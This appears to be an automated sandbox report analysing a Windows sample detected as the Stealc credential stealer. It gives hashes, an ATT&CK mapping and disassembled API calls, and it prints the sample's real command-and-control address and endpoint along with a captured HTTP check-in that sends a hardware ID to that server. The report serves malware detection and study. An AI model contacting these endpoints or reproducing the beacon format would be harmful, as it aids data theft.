                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00149600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00149600
                Source: file.exe, file.exe, 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: t9Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00147B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00146920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00146920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00147850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00147850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00147A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00147A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1520, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1520, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe42%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/E17%VirustotalBrowse
                http://185.215.113.37/ws17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpy17%VirustotalBrowse
                http://185.215.113.37/217%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/Efile.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/2file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/wsfile.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpyfile.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523176
                Start date and time:2024-10-01 08:19:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 2m 38s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 81%
                • Number of executed functions: 19
                • Number of non-executed functions: 86
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.9476080917684975
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'858'048 bytes
                MD5:564e5677e7262707df20c3ea7f110513
                SHA1:be8c6288b0baf0bd470e6ab8174e85c03470e0f5
                SHA256:8ed1f28fe0588fd7e27b22329ba5c2cbed9bf6aeec4e2e4dbe2cf751f2f1d629
                SHA512:32512119af4d302374cb3abf690ca20ddeaf99d542e91840b92f3ec3d04bb201e62cc785c2464db67011d010ea5ea0de08b6ae9d176c69d5ddf6f608123ed81c
                SSDEEP:49152:O5J2ApiaFNyPOqc9Tw0hUiunNiAfuetwA3tsPdDxnz7:O5JnXNym19k0hUiu8Ameth3G1Dh
                TLSH:0B85331A1C599D3CEA9F667D235B53EB60B5FD4E24E800B70FA61476E03A3423B3254E
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0xaa5000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F5B4CB29F9Ah
                pabsb mm0, qword ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                jmp 00007F5B4CB2BF95h
                add byte ptr [0000000Ah], al
                add byte ptr [eax], al
                add byte ptr [eax], dh
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edx], cl
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [ecx], cl
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add ecx, dword ptr [edx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], cl
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add ecx, dword ptr [edx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], cl
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                mov cl, 80h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add al, 00h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                and al, 00h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add dword ptr [eax+00000000h], eax
                add byte ptr [eax], al

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x22800b1bcb43454d2b3d21b9b457ab2abc631unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x2a60000x200643e7c0bd22689a496ad5e5ca1161f8bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                xlnfjtas0x5040000x1a00000x19f800b5e25e1bc4819a19089f9d44b4dfbc55False0.994943263011432data7.954276086869488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                vyivhryn0x6a40000x10000x400650ee8548618859a8d4792c23bbe8fddFalse0.7841796875data6.0609524178209915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x6a50000x30000x220068fc64b19066323e0e5e1cf865dacd6aFalse0.1032858455882353DOS executable (COM)1.2308457568560487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-01T08:19:58.612159+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 1, 2024 08:19:57.505016088 CEST4970480192.168.2.5185.215.113.37
                Oct 1, 2024 08:19:57.680705070 CEST8049704185.215.113.37192.168.2.5
                Oct 1, 2024 08:19:57.680803061 CEST4970480192.168.2.5185.215.113.37
                Oct 1, 2024 08:19:57.681005955 CEST4970480192.168.2.5185.215.113.37
                Oct 1, 2024 08:19:57.686271906 CEST8049704185.215.113.37192.168.2.5
                Oct 1, 2024 08:19:58.381277084 CEST8049704185.215.113.37192.168.2.5
                Oct 1, 2024 08:19:58.381346941 CEST4970480192.168.2.5185.215.113.37
                Oct 1, 2024 08:19:58.384572983 CEST4970480192.168.2.5185.215.113.37
                Oct 1, 2024 08:19:58.389328003 CEST8049704185.215.113.37192.168.2.5
                Oct 1, 2024 08:19:58.612097025 CEST8049704185.215.113.37192.168.2.5
                Oct 1, 2024 08:19:58.612159014 CEST4970480192.168.2.5185.215.113.37
                Oct 1, 2024 08:20:02.679986000 CEST4970480192.168.2.5185.215.113.37

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549704185.215.113.37801520C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Oct 1, 2024 08:19:57.681005955 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 1, 2024 08:19:58.381277084 CEST203INHTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 06:19:58 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 1, 2024 08:19:58.384572983 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCB
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 41 31 35 35 39 32 32 44 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a
                Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="hwid"31A155922DF51660493485------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build"doma------AAKKKEBFCGDBGDGCFHCB--
                Oct 1, 2024 08:19:58.612097025 CEST210INHTTP/1.1 200 OK
                Date: Tue, 01 Oct 2024 06:19:58 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:02:19:53
                Start date:01/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x130000
                File size:1'858'048 bytes
                MD5 hash:564E5677E7262707DF20C3EA7F110513
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:7.9%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.7%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
                  execution_graph 13438 1469f0 13483 132260 13438->13483 13462 146a64 13463 14a9b0 4 API calls 13462->13463 13464 146a6b 13463->13464 13465 14a9b0 4 API calls 13464->13465 13466 146a72 13465->13466 13467 14a9b0 4 API calls 13466->13467 13468 146a79 13467->13468 13469 14a9b0 4 API calls 13468->13469 13470 146a80 13469->13470 13635 14a8a0 13470->13635 13472 146b0c 13639 146920 GetSystemTime 13472->13639 13473 146a89 13473->13472 13475 146ac2 OpenEventA 13473->13475 13477 146af5 CloseHandle Sleep 13475->13477 13478 146ad9 13475->13478 13481 146b0a 13477->13481 13482 146ae1 CreateEventA 13478->13482 13481->13473 13482->13472 13836 1345c0 13483->13836 13485 132274 13486 1345c0 2 API calls 13485->13486 13487 13228d 13486->13487 13488 1345c0 2 API calls 13487->13488 13489 1322a6 13488->13489 13490 1345c0 2 API calls 13489->13490 13491 1322bf 13490->13491 13492 1345c0 2 API calls 13491->13492 13493 1322d8 13492->13493 13494 1345c0 2 API calls 13493->13494 13495 1322f1 13494->13495 13496 1345c0 2 API calls 13495->13496 13497 13230a 13496->13497 13498 1345c0 2 API calls 13497->13498 13499 132323 13498->13499 13500 1345c0 2 API calls 13499->13500 13501 13233c 13500->13501 13502 1345c0 2 API calls 13501->13502 13503 132355 13502->13503 13504 1345c0 2 API calls 13503->13504 13505 13236e 13504->13505 13506 1345c0 2 API calls 13505->13506 13507 132387 13506->13507 13508 1345c0 2 API calls 13507->13508 13509 1323a0 13508->13509 13510 1345c0 2 API calls 13509->13510 13511 1323b9 13510->13511 13512 1345c0 2 API calls 13511->13512 13513 1323d2 13512->13513 13514 1345c0 2 API calls 13513->13514 13515 1323eb 13514->13515 13516 1345c0 2 API calls 13515->13516 13517 132404 13516->13517 13518 1345c0 2 API calls 13517->13518 13519 13241d 13518->13519 13520 1345c0 2 API calls 13519->13520 13521 132436 13520->13521 13522 1345c0 2 API calls 13521->13522 13523 13244f 13522->13523 13524 1345c0 2 API calls 13523->13524 13525 132468 13524->13525 13526 1345c0 2 API calls 13525->13526 13527 132481 13526->13527 13528 1345c0 2 API calls 13527->13528 13529 13249a 13528->13529 13530 1345c0 2 API calls 13529->13530 13531 1324b3 13530->13531 13532 1345c0 2 API calls 13531->13532 13533 1324cc 13532->13533 13534 1345c0 2 API calls 13533->13534 13535 1324e5 13534->13535 13536 1345c0 2 API calls 13535->13536 13537 1324fe 13536->13537 13538 1345c0 2 API calls 13537->13538 13539 132517 13538->13539 13540 1345c0 2 API calls 13539->13540 13541 132530 13540->13541 13542 1345c0 2 API calls 13541->13542 13543 132549 13542->13543 13544 1345c0 2 API calls 13543->13544 13545 132562 13544->13545 13546 1345c0 2 API calls 13545->13546 13547 13257b 13546->13547 13548 1345c0 2 API calls 13547->13548 13549 132594 13548->13549 13550 1345c0 2 API calls 13549->13550 13551 1325ad 13550->13551 13552 1345c0 2 API calls 13551->13552 13553 1325c6 13552->13553 13554 1345c0 2 API calls 13553->13554 13555 1325df 13554->13555 13556 1345c0 2 API calls 13555->13556 13557 1325f8 13556->13557 13558 1345c0 2 API calls 13557->13558 13559 132611 13558->13559 13560 1345c0 2 API calls 13559->13560 13561 13262a 13560->13561 13562 1345c0 2 API calls 13561->13562 13563 132643 13562->13563 13564 1345c0 2 API calls 13563->13564 13565 13265c 13564->13565 13566 1345c0 2 API calls 13565->13566 13567 132675 13566->13567 13568 1345c0 2 API calls 13567->13568 13569 13268e 13568->13569 13570 149860 13569->13570 13841 149750 GetPEB 13570->13841 13572 149868 13573 149a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13572->13573 13574 14987a 13572->13574 13575 149af4 GetProcAddress 13573->13575 13576 149b0d 13573->13576 13577 14988c 21 API calls 13574->13577 13575->13576 13578 149b46 13576->13578 13579 149b16 GetProcAddress GetProcAddress 13576->13579 13577->13573 13580 149b4f GetProcAddress 13578->13580 13581 149b68 13578->13581 13579->13578 13580->13581 13582 149b71 GetProcAddress 13581->13582 13583 149b89 13581->13583 13582->13583 13584 146a00 13583->13584 13585 149b92 GetProcAddress GetProcAddress 13583->13585 13586 14a740 13584->13586 13585->13584 13587 14a750 13586->13587 13588 146a0d 13587->13588 13589 14a77e lstrcpy 13587->13589 13590 1311d0 13588->13590 13589->13588 13591 1311e8 13590->13591 13592 131217 13591->13592 13593 13120f ExitProcess 13591->13593 13594 131160 GetSystemInfo 13592->13594 13595 131184 13594->13595 13596 13117c ExitProcess 13594->13596 13597 131110 GetCurrentProcess VirtualAllocExNuma 13595->13597 13598 131141 ExitProcess 13597->13598 13599 131149 13597->13599 13842 1310a0 VirtualAlloc 13599->13842 13602 131220 13846 1489b0 13602->13846 13605 131249 __aulldiv 13606 13129a 13605->13606 13607 131292 ExitProcess 13605->13607 13608 146770 GetUserDefaultLangID 13606->13608 13609 146792 13608->13609 13610 1467d3 13608->13610 13609->13610 13611 1467b7 ExitProcess 13609->13611 13612 1467c1 ExitProcess 13609->13612 13613 1467a3 ExitProcess 13609->13613 13614 1467ad ExitProcess 13609->13614 13615 1467cb ExitProcess 13609->13615 13616 131190 13610->13616 13617 1478e0 3 API calls 13616->13617 13618 13119e 13617->13618 13619 1311cc 13618->13619 13620 147850 3 API calls 13618->13620 13623 147850 GetProcessHeap RtlAllocateHeap GetUserNameA 13619->13623 13621 1311b7 13620->13621 13621->13619 13622 1311c4 ExitProcess 13621->13622 13624 146a30 13623->13624 13625 1478e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13624->13625 13626 146a43 13625->13626 13627 14a9b0 13626->13627 13848 14a710 13627->13848 13629 14a9c1 lstrlen 13630 14a9e0 13629->13630 13631 14aa18 13630->13631 13633 14a9fa lstrcpy lstrcat 13630->13633 13849 14a7a0 13631->13849 13633->13631 13634 14aa24 13634->13462 13636 14a8bb 13635->13636 13637 14a90b 13636->13637 13638 14a8f9 lstrcpy 13636->13638 13637->13473 13638->13637 13853 146820 13639->13853 13641 14698e 13642 146998 sscanf 13641->13642 13882 14a800 13642->13882 13644 1469aa SystemTimeToFileTime SystemTimeToFileTime 13645 1469e0 13644->13645 13646 1469ce 13644->13646 13648 